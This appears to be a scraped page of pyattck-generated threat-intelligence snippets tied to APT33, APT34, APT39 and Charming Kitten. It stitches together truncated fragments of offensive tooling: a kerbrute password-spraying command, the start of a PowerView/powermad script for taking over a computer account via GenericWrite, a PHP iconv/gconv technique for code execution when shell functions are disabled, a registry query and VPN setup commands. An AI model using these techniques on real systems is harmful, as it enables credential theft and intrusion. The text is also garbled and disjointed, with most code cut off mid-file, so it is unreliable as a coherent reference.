The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
PowerShell.exe | |
ProcMon.exe | |
- Path Includes C:\Exploit | |
- Process Name: svchost.exe | |
Add-VpnConnection -Name "hacknroll" -ServerAddress "0.0.0.0" -PassThru | |
REG QUERY HKLM\SOFTWARE\Microsoft\Tracing |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
#!/usr/bin/env python3 | |
# pip install python-twitter | |
# pip install colored | |
# pip install google | |
import re | |
import urllib3 | |
import twitter | |
import requests |
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Credits: @hugeh0ge
It uses iconv
, in php, in order to execute the same payload.
Uses cases :
iconv
(in_charset), you can set an env var and you can upload arbitrary files (.so
library file and the gconv-modules
file) and you know their path.system
, shell_exec
, curl_exec
and other functions are disabled but you can setenv
(and LD_PRELOAD
is blacklisted).#!/usr/bin/env python3 | |
""" | |
Script used to pull down the current video descriptions from ippsec's youtube channel. | |
The raw output still has a few HTML tags that need to be manually removed and there | |
also seem to be multiple duplicates of videos that have been removed in the output | |
saved as ippsec-details.txt | |
""" | |
import re | |
import sys |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386' |
#!/usr/bin/env python | |
import argparse | |
import sys | |
import binascii | |
import socket | |
import re | |
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES | |
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte) |